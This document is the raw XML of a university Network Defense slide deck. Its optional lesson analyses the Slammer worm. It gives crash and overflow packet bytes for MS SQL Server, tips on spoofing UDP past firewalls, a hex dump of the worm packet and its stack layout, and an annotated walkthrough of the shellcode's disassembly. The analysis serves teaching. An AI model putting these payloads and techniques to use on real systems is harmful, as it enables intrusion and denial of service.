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3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30"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="397" r:id="rId3"/>
    <p:sldId id="368" r:id="rId4"/>
    <p:sldId id="334" r:id="rId5"/>
    <p:sldId id="335" r:id="rId6"/>
    <p:sldId id="336" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="260" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="262" r:id="rId12"/>
    <p:sldId id="271" r:id="rId13"/>
    <p:sldId id="257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2" r:id="rId23"/>
    <p:sldId id="273" r:id="rId24"/>
    <p:sldId id="274" r:id="rId25"/>
    <p:sldId id="275" r:id="rId26"/>
    <p:sldId id="276" r:id="rId27"/>
    <p:sldId id="277" r:id="rId28"/>
    <p:sldId id="398" r:id="rId29"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7315200" cy="9601200"/>
  <p:custDataLst>
    <p:tags r:id="rId31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21" autoAdjust="0"/>
    <p:restoredTop sz="81930" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="211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tags" Target="tags/tag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D208448-EA90-48C3-9EBA-9752339ACEF4}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/24/18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BC2C3F8-920C-4239-9891-79F2271E8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234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E80AE-A2D3-45AA-9282-165AD6710FE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677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926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7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249488" y="3402013"/>
            <a:ext cx="5372100" cy="2058987"/>
            <a:chOff x="914400" y="3657600"/>
            <a:chExt cx="7162800" cy="2059641"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="914400" y="3657600"/>
              <a:ext cx="7162800" cy="1295811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6" name="Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="914400" y="5069335"/>
              <a:ext cx="7162800" cy="647906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7" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="914400" y="3657600"/>
              <a:ext cx="228600" cy="1295811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Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="914400" y="5069335"/>
              <a:ext cx="228600" cy="647906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000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2955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  <a:lvl3pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl5pPr marL="1371600" indent="0" algn="l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7863"/>
            <a:ext cx="7886700" cy="4799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01FE8-1818-4A56-B30A-CCD984F456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CB3A4-4A00-44DB-9BF1-EB2CA51DEF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19226"/>
            <a:ext cx="3868340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44726"/>
            <a:ext cx="3868340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19225"/>
            <a:ext cx="3887391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44726"/>
            <a:ext cx="3887391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54BC4-0553-463F-B622-46053397F1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CD291-EBF4-47B8-BDB1-CD835FFC1B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CF714-F625-4053-9B06-9C6DF9A769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FBFE-FF7D-4FA1-B21A-29DE576991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287DE2-E1A2-4F41-96FE-94AF4425C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62898"/>
            <a:ext cx="7886700" cy="5649803"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1800"/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Please attribute Dr. Jim Alves-Foss and Dr. Jia Song</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>University of Idaho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Except where otherwise noted, this work is licensed under https://creativecommons.org/licenses/by-nc-sa/4.0/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Not withstanding the non-commercial license terms, non-profit educational institutions are granted a non-exclusive, royalty-free license to adapt and use this material, with attribution.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Creative Commons and the double C in a circle are registered trademarks of Creative commons in the United States and other countries. Third party marks and brands are the property of their respective holders.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D2FFADE-E1BC-48C1-83AA-6DDDD39A33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267019-40B7-405C-98B7-75F3216AFF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CBFC76A-A606-42CF-BCDF-C73975C150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71883" y="1533982"/>
            <a:ext cx="5200650" cy="12096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7298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ags" Target="../tags/tag2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creativecommons.org/licenses/by-nc/4.0/legalcode" TargetMode="Externa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267019-40B7-405C-98B7-75F3216AF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7" name="Title Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="628650" y="457200"/>
            <a:ext cx="568642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90488"/>
            <a:ext cx="138113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68580" tIns="34290" rIns="68580" bIns="3429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cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 2" descr="reative Commons License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138113" y="6402388"/>
            <a:ext cx="8382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976314" y="6330371"/>
            <a:ext cx="6739720" cy="4154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©201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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by Dr. Jim Alves-Foss and Dr. Jia Song. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="x-none" sz="1050" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>This document is licensed with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" sz="1050" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="x-none" sz="1050" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="x-none" sz="1050" dirty="0"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dirty="0">
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Creative Commons Attribution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" sz="1050" dirty="0">
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>-Non-Commercial-Share Alike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="x-none" sz="1050" dirty="0">
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t> 4.0 International License</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" sz="1050" dirty="0">
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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  <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>(CC BY-NC-SA 4.0) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="x-none" sz="1050" dirty="0">
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="x-none" sz="1050" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1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7" r:id="rId9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32.x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33.x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35.x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36.x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38.x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39.xml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ida.org/publications/papers/2003/sapphire/sapphire.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/security-resources/malwarefaq/ms-sql-exploit" TargetMode="External"/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hyperlink" Target="https://www.cnet.com/news/counting-the-cost-of-slammer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Module: Network Defense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subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2630488" y="4999038"/>
            <a:ext cx="4219575" cy="277812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slammer Decoded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086378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‘0x04’ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If first byte set to 0x04 server takes what ever comes after the 0x04, plugs into a buffer using unsafe string copy which can overflow the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional problem is UDP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy to spoof the IP address  (pretend to be “internal address”-- this will get around a great deal of firewalls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If set the UDP source port to 53, looks like a response to a DNS query, then again this will bypass a large number of firewalls.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3459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‘0x08’ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>If first byte is ‘0x08’ Possible to kill the SQL Server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>When the server dies it has just called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>strtok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>(). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>SQL Server, when it calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>strtok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>() is looking for a colon (:) but as there isn't one then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>strtok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>() returns NULL but whoever coded this part of the server didn't check to see if the function had succeeded or not. They pass the pointer to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>() but, as it's NULL, SQL crashes - the exception isn't handled. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>If a two byte packet, \x08\x3A – (the 0x3A is a colon), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>strtok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>() succeeds and a pointer is returned but SQL still crashes, as there is nothing after the colon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> crashes - another failure to check if things have worked out okay. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>If send a 3-byte packet: \x08\x3A\x31 - SQL survives. This looks too close to being a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>host:port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> kind of thing so we plug in an overly long string, tack on a :22 at the end and fire off the packet. This time there's a heap overflow - one that allows an attacker to gain complete control over the server. The same caveats about UDP and firewalls, of course, apply here too.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3387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 and Buffer Overflow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752600"/>
            <a:ext cx="2543175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40898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Slammer Worm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ts val="1040"/>
              </a:lnSpc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4500 0194 cf09 0000 8011 e630 c0a8 0164</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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c0a8 016a 049f 059a 0180 ac8d 0401 0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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0101 0101 0101 0101 0101 0101 0101 0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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0101 0101 0101 0101 0101 0101 0101 0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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0101 0101 0101 0101 0101 0101 0101 0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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0101 0101 0101 0101 0101 0101 0101 0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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0101 0101 0101 0101 0101 0101 0101 0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0101 0101 0101 0101 0101 0101 01dc c9b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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42eb 0e01 0101 0101 0101 70ae 4201 70ae</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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4290 9090 9090 9090 9068 dcc9 b042 b801</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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0101 0131 c9b1 1850 e2fd 3501 0101 0550</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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89e5 5168 2e64 6c6c 6865 6c33 3268 6b65</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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726e 5168 6f75 6e74 6869 636b 4368 4765</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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7454 66b9 6c6c 5168 3332 2e64 6877 7332</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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5f66 b965 7451 6873 6f63 6b66 b974 6f51</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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6873 656e 64be 1810 ae42 8d45 d450 ff16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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508d 45e0 508d 45f0 50ff 1650 be10 10ae</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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428b 1e8b 033d 558b ec51 7405 be1c 10ae</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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42ff 16ff d031 c951 5150 81f1 0301 049b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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81f1 0101 0101 518d 45cc 508b 45c0 50ff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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166a 116a 026a 02ff d050 8d45 c450 8b45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1040"/>
              </a:lnSpc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c28d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2768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Slammer Worm Insides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buffer overflow is successful (first byte ‘0x04’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Puts 42B0C9DC on the stack as a return address. This address is in sqlsort.dll and contains the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which jumps BACK to the attack code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After overflow, before jumping to code, payload is corrupted, so code rebuilds its buffer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1010101h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ecx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cl, 18h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FIXUP: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Push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; [EBP-8 to EBP-60h]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loop FIXUP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5010101h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push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; [EBP-64h]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5313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Slammer Stack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[Worm Body]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42 B0 C9 DC 01 01 01 01 				[EBP+58h]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01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 	[EBP+50h]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01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 	[EBP+40h]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01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 	[EBP+30h]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01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 	[EBP+20h]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01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 	[EBP+10h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/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01 01 01 01 01 01 01 01 01 01 01 01 04 00 00 00 	[EBP-0]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00 00 00 00 6C 6C 64 2E 32 33 6C 65 6E 72 65 6B	[EBP-10h] ;'kernel32.dll'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00 00 00 00 74 6E 75 6F 43 6B 63 69 54 74 65 47 	[EBP-20h] ;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GetTickCount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00 00 6C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6C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64 2E 32 33 5F 32 73 77 		[EBP-2Ch]; 'ws2_32.dll'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00 00 74 65 6B 63 6F 73 				[EBP-34h] ; 'socket'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00 00 6F 74 64 6E 65 73 				[EBP-3Ch];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sendto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[Base address of ws2_32.dll] 			[EBP-40h] ;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00 00 00 00 00 00 00 00 				[EBP-48h] ; sin_zero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[Pseudo-Random seed] 				[EBP-4Ch];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sin_addr.s_addr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v-SE" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>9A 05 00 02 				[EBP-50h] ; sin_port, sin_family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[UDP socket descriptor] [EBP-54h]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2618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Slammer Worm Insides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stack is then "normalized" for the exploit to continue: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ebp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esp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; EBP=ESP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, a series of strings and terminating nulls are pushed onto the stack. This is common practice in simple exploits that do not require a lot of data to operate. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register is used to store nulls.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; [EBP4]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9086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Slammer Worm Insides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600" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set up a stack frame to store the following strings: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6C6C642Eh 	; [EBP-8]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32336C65h 	; [EBP-0Ch]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6E72656Bh 	; [EBP-10h] Push string kernel32.dll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		; [EBP-14h]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746E756Fh	; [EBP-18h] Push string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GetTickCount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436B6369h 	; [EBP-1Ch]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54746547h 	; [EBP-20h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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cx, 6C6Ch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		; [EBP-24h]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642E3233h 	; [EBP-28h] Push string ws2_32.dll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5F327377h 	; [EBP-2Ch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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cx, 7465h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; [EBP-30h]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6B636F73h 	; [EBP-34h] Push string socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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cx, 6F74h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		; [EBP-38h]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646E6573h 	; [EBP-3Ch] Push string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sendto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8573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Slammer Worm Insides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locates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> from the Import Address Table (IAT) of the sqlsort.dll library:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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42AE1018h ; sqlsort.dll-&gt;IAT entry for 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		  ;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LoadLibrary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/>
              <a:t>loads the ws_32.dll library into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and saves the resulting handle for a later </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="40005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lea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[ebp-2Ch]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push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		      ; [EBP-40h]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call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] ; Procedure exit: ESP=EBP-3Ch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push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	      ; [EBP-40h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>pushes a string pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetTickCount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) onto stack. This will be used as an argument to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> call after the next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> call: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lea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[ebp-20h]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; [EBP-44h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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3215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Slammer Worm Insides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then obtains a handle to the kernel32.dll library via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> function referenced in ESI. This is done in the same way as the previous loading of ws_32.dll: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lea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[ebp-10h] ; address of string "kernel32.dll"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; [EBP-48h]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] ; Procedure exit: ESP=EBP-44h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; [EBP-48h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>attempts to locate the entry for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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42AE1010h ; Move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sqlsort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:[IAT] into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457200" lvl="1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[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] 	; Move (function entry point)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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[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] 	; Move 4 instruction bytes into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985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DDDE79-84CD-4BD4-8191-64CD17F70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Defense Module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11D7D9-AFF5-4F1C-A116-5D460DCCE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Module Description:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The intent of this Knowledge Unit is to provide students with an understanding of network threats and defensive techniques. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Topics:​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson 1: Network Attacks and Threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson 2: Firewalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netfilter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson 4: Intrusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Option Lesson: Slammer Worm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5BCECBD-F96D-47DA-9A6D-248B240ABC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3152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Slammer Worm Insides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attempts to fingerprint the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> API, and will fall back to the other known base address if this fails;  due to slight discrepancies in the sqlsort.dll in services packs 1 and 2 of MSDE 2000. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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51EC8B55h ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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short VALID_GP ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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GetProcAddress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(kernel32_base,GetTickCount)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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42AE101Ch ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>This point is only reached if the previous test failed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>next assignment will assign </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> the sqlsort.dll-&gt;IAT entry for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and calls it. The API receives its two parameters from the top of the stack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2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FOUND_IT:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2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; [ESP=EBP-40h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2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GetProcAddress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(kernel32_base,GetTickCount</a:t>
            </a:r>
            <a:r>
